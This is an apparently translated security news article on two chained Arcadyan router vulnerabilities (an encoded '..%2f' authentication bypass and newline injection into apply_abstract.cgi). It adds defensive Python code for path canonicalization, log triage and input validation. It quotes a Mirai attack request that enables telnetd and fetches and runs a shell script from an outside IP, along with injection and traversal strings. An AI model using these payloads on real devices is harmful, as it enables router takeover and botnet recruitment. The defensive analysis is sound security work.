A vulnerability in home routers affects 17 manufacturers

A large-scale attack has been recorded against home routers whose firmware uses an HTTP server implementation from the company Arcadyan. To take control of the devices, a combination of two vulnerabilities is used that allows arbitrary code execution with root privileges. The problem affects a range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices shipped under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and in that time has managed to migrate to at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, allows any web interface script to be accessed without authentication. The essence of the vulnerability is that in the web interface some directories, from which images, CSS files and JavaScript scripts are served, are accessible without authentication. The directories for which unauthenticated access is allowed are checked using a prefix mask on the request path. The firmware blocks the "../" character sequence used in paths to move to the parent directory, but the "..%2f" combination is overlooked. Thus it is possible to open protected pages by sending requests like "http://192.168.1.1/images/..%2findex.htm".
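The check described above fails because it is a prefix match on the raw request path with a literal "../" filter. The following added example (not Arcadyan's code; the public directory list is an assumption for illustration) places that weak check beside a hardened version that percent-decodes until the path is stable, normalizes it, and only then compares the canonical path against the allow-list, so the encoded traversal no longer passes as a public resource:

```python
"""
Added example: weak prefix-based authorization check versus a hardened one.
Neither function is from the Arcadyan firmware; they model the logic the
article describes. PUBLIC_PREFIXES is an assumed allow-list for illustration.
"""
import posixpath
from urllib.parse import unquote

# Directories served without authentication (assumed for this example).
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")


def weak_is_public(raw_path: str) -> bool:
    """Flawed logic: prefix match on the raw path, blocking only the literal '../'."""
    if "../" in raw_path:
        return False
    return raw_path.startswith(PUBLIC_PREFIXES)


def hardened_is_public(raw_path: str) -> bool:
    """Decode until stable, normalize, then compare the canonical path to the allow-list."""
    path = raw_path.split("?", 1)[0]
    # Decode repeatedly so double encoding (..%252f) cannot slip past; refuse if
    # the path is still changing after a few rounds.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return False
    # NUL bytes and backslashes have no business in a URL path on this server.
    if "\x00" in path or "\\" in path:
        return False
    # normpath collapses '.' and '..' segments; prepend '/' so it stays absolute.
    canonical = posixpath.normpath("/" + path.lstrip("/"))
    # Compare the canonical path, not the raw one, against the public prefixes.
    # normpath drops a trailing slash, so a bare directory request is also handled.
    return any(canonical.startswith(p) or canonical + "/" == p for p in PUBLIC_PREFIXES)


if __name__ == "__main__":
    for p in ("/images/logo.png", "/images/../index.htm", "/images/..%2findex.htm"):
        print(f"{p:32} weak={weak_is_public(p)!s:5} hardened={hardened_is_public(p)}")
```

The point of the hardened version is ordering: decode and canonicalize first, authorize second. Any filter that inspects the raw path before decoding can be bypassed by an encoding it did not anticipate.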

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially formatted parameters to the apply_abstract.cgi script, which does not check for the presence of a newline character in the parameters. For example, when performing a ping, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field holding the IP address to be checked, and the script, when creating the settings file /tmp/etc/config/.glbcfg, will write the line "ARC_SYS_TelnetdEnable=1" into it, which enables the telnetd server and gives unrestricted shell access with root privileges. Similarly, by setting the ARC_SYS_ parameter, arbitrary code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".

To exploit the vulnerabilities, the attacker must be able to send requests to the network port on which the web interface is running. Judging by the spread of the attack, many operators leave access to their devices open from the external network to simplify troubleshooting by the support service. If access to the interface is limited to the internal network, an attack can still be carried out from the external network using the "DNS rebinding" technique. The vulnerabilities are already being actively used to connect routers to the Mirai botnet:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5dress 212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
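Two things a defender wants from the description above: a way to spot this two-stage pattern in web server logs, and the input validation the CGI should have applied to the ping address field. The added example below (not from the article, Arcadyan or any operator) does both over constructed sample requests; the parameter name "ping_target" is a hypothetical stand-in, since the article does not name the form field:

```python
"""
Added example: log triage for the traversal + newline-injection pattern, and
the strict validation that would block the injection at the CGI. The sample
requests are constructed for this example; "ping_target" is a hypothetical
field name.
"""
import ipaddress
import re
from typing import List, Tuple
from urllib.parse import unquote

# Encoded or literal parent-directory traversal right after a slash.
TRAVERSAL_RE = re.compile(r"/\.\.(%2f|%252f|/)", re.IGNORECASE)
CGI_RE = re.compile(r"apply_abstract\.cgi", re.IGNORECASE)
# Newline / carriage return in either encoded or literal form.
NEWLINE_RE = re.compile(r"%0a|%0d|\n|\r", re.IGNORECASE)


def classify_request(method: str, path: str, body: str) -> List[str]:
    """Return the list of indicators found in one request; an empty list means clean."""
    hits: List[str] = []
    if TRAVERSAL_RE.search(path) or "/../" in unquote(path):
        hits.append("auth-bypass-traversal")       # CVE-2021-20090 pattern
    if CGI_RE.search(path) and NEWLINE_RE.search(body):
        hits.append("config-newline-injection")    # CVE-2021-20091 pattern
    if method == "POST" and "ARC_SYS_TelnetdEnable" in unquote(body):
        hits.append("telnetd-enable")              # the concrete payload the article names
    return hits


def validate_ping_target(value: str) -> bool:
    """Validation a fixed CGI should apply before writing config: exactly one IP, nothing else."""
    # Reject anything that could start a new config line or a new key=value pair.
    if any(c in value for c in "\r\n\x00=&;"):
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


# Constructed sample log: (method, path, decoded body). Not real traffic.
SAMPLE_LOG: List[Tuple[str, str, str]] = [
    ("GET", "/images/logo.png", ""),
    ("GET", "/images/..%2findex.htm", ""),
    ("POST", "/images/..%2fapply_abstract.cgi",
     "action=start_ping&ping_target=192.168.1.2%0AARC_SYS_TelnetdEnable=1"),
    ("POST", "/apply_abstract.cgi", "action=start_ping&ping_target=192.168.1.2"),
]


def triage(log: List[Tuple[str, str, str]]) -> List[Tuple[str, List[str]]]:
    """Run the classifier over every request and pair each path with its indicators."""
    return [(path, classify_request(method, path, body)) for method, path, body in log]


if __name__ == "__main__":
    for path, hits in triage(SAMPLE_LOG):
        print(f"{path:40} {hits or 'clean'}")
```

The classifier keys on the structural signs of the attack (an encoded parent-directory step in the path, a newline inside a parameter sent to the config-writing script) rather than on one botnet's download URL, so it still fires when the second-stage payload changes. The validator shows the fix on the other side: a field that is supposed to hold an IP address must parse as exactly one IP address and nothing more.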

source: budenet.ru
